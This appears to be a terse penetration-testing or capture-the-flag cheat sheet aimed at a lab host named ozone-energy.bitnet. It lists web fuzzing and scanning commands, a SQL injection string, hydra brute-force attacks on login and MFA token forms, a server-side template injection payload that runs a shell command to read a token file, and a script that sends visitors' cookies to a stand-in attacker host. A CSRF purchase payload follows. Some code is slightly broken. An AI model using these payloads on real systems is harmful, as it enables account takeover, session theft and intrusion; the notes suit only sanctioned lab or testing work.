IM
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://ozone-energy.bitnet
a
nmap -sV -p80 ozone-energy.bitnet
wapiti -u http://ozone-energy.bitnet -m all
dirb http://ozone-energy.bitnet /usr/share/wordlists/custom/ozone-wordlist.txt.
" or "1"="1
hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/[LOGINPAGE]:username=^USER^&password=^PASS^&Login=Login:Invalid Password"
hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Username or Password"
SSTI:
{{request.application.globals.builtins.import('os').popen('cat /tmp/t0k3n.txt').read()}}
-----------------------------------------------------------------------------
cat generate.sh for i in seq 2023 9999
; do printf "%0003d\n" $i; done
hydra -l admin -P /home/kali/Downloads/list.txt 10.102.11.237 http-form-post "/prompt:username=^USER^&mfa_token=^PASS^&Login=Login:Invalid token, please try again."
------------------------------------------------------------------------------
// CSRF & XSS steal cookie - require steal.php to write requests
steal cookie payload:
<script>
var i=new image();
i.src="http://attacker/steal.php?q="+document.cookie;
</script>
Cross Site Request Forgery
<script>
var i= new Image();
i.src="http://site.com/finalize_checkout.php?itemList=1%2C1&itemquantity=1%2C1";
</script>
Last updated
Was this helpful?